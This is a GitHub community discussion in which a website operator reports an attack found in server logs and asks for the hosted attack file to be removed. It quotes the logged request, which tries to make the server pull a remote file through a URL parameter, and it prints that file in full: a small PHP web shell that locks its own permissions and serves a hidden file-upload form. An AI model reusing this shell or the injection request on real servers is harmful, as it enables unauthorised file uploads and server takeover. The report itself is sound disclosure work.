### DISCUSSION TITLE
Code at raw.githubusercontent.com

### DISCUSSION THREAD

**Discussion by n-gram-hub** [community/community#60020] [Other Feature Feedback, Questions, & Ideas] [answered]
### Select Topic Area

Bug

### Body

I was looking at the logs of a website I operate on and found this line:

`[03/Jul/2023:02:42:05 +0200] "GET /rindex.php?action=add&parameter=taf.php%7Chttps://raw.githubusercontent.com/Professor6T9/uploaders/main/taf.txt HTTP/1.1" 302 33`

I was curious and found this in taf.txt:

`<?php error_reporting(0);chmod(basename($_SERVER["PHP_SELF"]), 0444);echo("#Team Anon Force <br> https://t.me/teamanonforce");if(isset($_GET["taf"])){echo'<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo'<input type="file" name="file" size="30"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if($_POST['_upl']=="Upload"){if(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])){echo'S';}else{echo'F';}};};`

Shoudn't this file be removed? I couldn't reach the user page and couldn't find any other way to submit this issue to GitHub.

**Comment by drodecker** [comment, marked as answer]
This is being used to download malware to wordpress hosted servers.
